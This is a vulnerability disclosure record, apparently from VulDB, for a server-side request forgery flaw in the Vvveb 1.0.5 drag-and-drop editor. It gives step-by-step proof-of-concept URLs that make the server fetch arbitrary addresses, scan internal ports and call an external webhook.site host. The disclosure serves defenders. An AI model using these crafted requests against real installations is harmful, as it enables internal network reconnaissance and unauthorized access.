| Title | Vvveb 1.0.5 Server-Side Request Forgery |
|---|
| Description | Description
The endpoint [/vadmin123/?module=editor/editor&name=] is used for modifying a page using a drag and drop editor.
The issue is that an attacker can pass arbitrary URLs that the web app will attempt to load a given URL. This can be used to perform Server-Side Request Forgery (SSRF) and use it for internal port scanning.
This endpoint is accessible to “Editors” or anyone with privileges to modify posts or pages.
Reproduce
Login as an editor & open the following endpoint:
/vadmin123/index.php?module=content/posts&type=post
Open a post of your choice in “Design” mode where you can perform drag and drop, you may get an endpoint like this:
http://127.0.0.1/vadmin123/?module=editor/editor&name=Etiam+leo+nibh%2C+consectetur+nec+orci+et%2C+tempus+tempus+ex&url=//127.0.0.1/hello-world-4&template=content/post.html
For simplicity, I have changed the name of my post to shorten the URL. To perform SSRF, modify the URL to something like this:
http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:80/
This will open the index page of Vvveb for you. You can also open other pages like contact:
http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:80/page/contact
To use this for port scanning, you can simply change port 80 to a non-existent port like 9999:
http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:9999/
In this case, you get the following error:
Firefox Can’t Open This Page
To protect your security, 127.0.0.1 will not allow Firefox to display the page if another site has embedded it. To see this page, you need to open it in a new window.
This is normal. Now to test whether you can actually be sure that you can scan internal ports, create a dummy PHP server:
$ php -S x.x.x.x:10001
Peform connection:
http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:10001/
You will get requests in your PHP CLI and you will also see the following page load:
The requested resource /?theme=landing&r=0.5980099159582586 was not found on this server.
In a real world scenario, we won't have access to an internal PHP server. But you can also send external HTTP requests to sites like webhook.site:
http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//webhook.site/xxxxxxxxxxxxxxxxxxxxxxx
Response on page:
This URL has no default content configured. View in Webhook.site.
To perform port scanning, you can keep changing the port until you figure out internal services that are running and actually see them. |
|---|
| Source | ⚠️ https://hkohi.ca/vulnerability/9 |
|---|
| User | 0xHamy (UID 88518) |
|---|
| Submission | 07/29/2025 20:22 (9 months ago) |
|---|
| Moderation | 08/04/2025 08:27 (6 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 318646 [givanz Vvveb up to 1.0.5 Drag-and-Drop Editor editor url server-side request forgery] |
|---|
| Points | 19 |
|---|